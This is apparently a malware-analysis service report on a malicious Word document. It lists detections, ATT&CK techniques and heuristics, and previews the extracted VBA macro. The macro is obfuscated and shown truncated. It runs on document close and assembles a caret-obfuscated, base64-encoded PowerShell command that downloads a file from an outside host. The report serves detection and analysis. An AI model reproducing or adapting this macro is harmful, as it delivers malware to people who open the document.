MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoClose macro and a Shell() call indicate an attempt to execute arbitrary code. The ClamAV detection name 'Doc.Malware.Pwshell-6700199-0' suggests a PowerShell-based payload, though no specific PowerShell commands were directly extracted. The macro's obfuscated nature and the lack of clear URLs or commands prevent a higher confidence score.
Heuristics 6
-
ClamAV: Doc.Malware.Pwshell-6700199-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Pwshell-6700199-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 83614 bytes |
SHA-256: 75d57b021e859414f981606a82427a7c9febe924cd875166fbbce57c04d12cd5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const FaMOcitAnaHyRBAKoiyByisAqazoNuWYTEl = 0 Sub AutoClose() On Error Resume Next Dim daViMoLAPOfufILuBYxERIz(3) daViMoLAPOfufILuBYxERIz(0) = Right(NqYSERAcixeTijuGY, 4024) daViMoLAPOfufILuBYxERIz(1) = Sqr(3) daViMoLAPOfufILuBYxERIz(2) = Left(NqYSERAcixeTijuGY, 4024) Dim muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(3) Dim lIQEmiGUGosigDehojELOSInIxeja(3) lIQEmiGUGosigDehojELOSInIxeja(0) = Right(salIPigAgoqURIbARIc, 3316) lIQEmiGUGosigDehojELOSInIxeja(1) = Sqr(8) lIQEmiGUGosigDehojELOSInIxeja(2) = Left(salIPigAgoqURIbARIc, 3316) Dim KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(3) KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(0) = Right(aeHpaSEBPQ, 6460) KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(1) = Sqr(2) KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(2) = Left(aeHpaSEBPQ, 6460) muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(0) = Right(cezoAQiTYcIiOw, 9295) muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(1) = Sqr(2) muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(2) = Left(cezoAQiTYcIiOw, 9295) Dim lIcYnUbavUiEspwINYziCabuRulyvGUiU(3) Dim hEkUGoSUTeFIcnITjjUHiaEPiqUr(3) hEkUGoSUTeFIcnITjjUHiaEPiqUr(0) = Right(peLoLUxugekAgoZuxYGUxedI, 2202) hEkUGoSUTeFIcnITjjUHiaEPiqUr(1) = Sqr(9) hEkUGoSUTeFIcnITjjUHiaEPiqUr(2) = Left(peLoLUxugekAgoZuxYGUxedI, 2202) Dim PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(3) PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(0) = Right(iEdiCAkiQUDiiy, 1371) PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(1) = Sqr(10) PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(2) = Left(iEdiCAkiQUDiiy, 1371) Dim pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(3) pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(0) = Right(JEjIgZELaKUmoDuREdY, 1598) pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(1) = Sqr(1) pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(2) = Left(JEjIgZELaKUmoDuREdY, 1598) lIcYnUbavUiEspwINYziCabuRulyvGUiU(0) = Right(cUFuhArElOgOLErOsabiVAk, 8961) lIcYnUbavUiEspwINYziCabuRulyvGUiU(1) = Sqr(2) Dim FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(3) FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(0) = Right(siBeDaFisoSAfOveK, 6891) FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(1) = Sqr(3) FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(2) = Left(siBeDaFisoSAfOveK, 6891) Dim DutylUwWAxucakmYhigoPenyjeaiP(3) DutylUwWAxucakmYhigoPenyjeaiP(0) = Right(foGeMyBUWunO, 8525) DutylUwWAxucakmYhigoPenyjeaiP(1) = Sqr(1) DutylUwWAxucakmYhigoPenyjeaiP(2) = Left(foGeMyBUWunO, 8525) lIcYnUbavUiEspwINYziCabuRulyvGUiU(2) = Left(cUFuhArElOgOLErOsabiVAk, 8961) Dim FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(3) FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(0) = Right(NORiJIrIVApIlUV, 1662) FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(1) = Sqr(10) FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(2) = Left(NORiJIrIVApIlUV, 1662) Dim xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(3) xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(0) = Right(iipUaucOLIMaMeoKAqABiV, 8095) xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(1) = Sqr(3) xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(2) = Left(iipUaucOLIMaMeoKAqABiV, 8095) LIxDwIBaCaiUdUwibomEBaiOnAaygjYyZSaTAt = "d.exe /" + Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + " p^O^w^e^R^s^H^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^" + Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + "^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^" + Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + "^A^A^6^A^C^8^A^L^w^B^s^A^G^U^A^b^w^B^w^A^G^E^A^Z^A" Dim ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(3) ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(0) = Right(ideMOWeTYNYsoiezeZIl, 7164) ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(1) = Sqr(7) ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(2) = Left(ideMOWeTYNYsoiezeZIl, 7164) Dim GaQeDIRIrODAwUbAMorIzxAaIVyKuVIKOTID(3) GaQeDIRIrODAwUbAMorIzxAaIVyKuVIKOTID(0) = Right(wuwIDyQACASENIxojzUrYf, 1148) GaQeDIRIrODAwUbAMorIzxAaIV ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.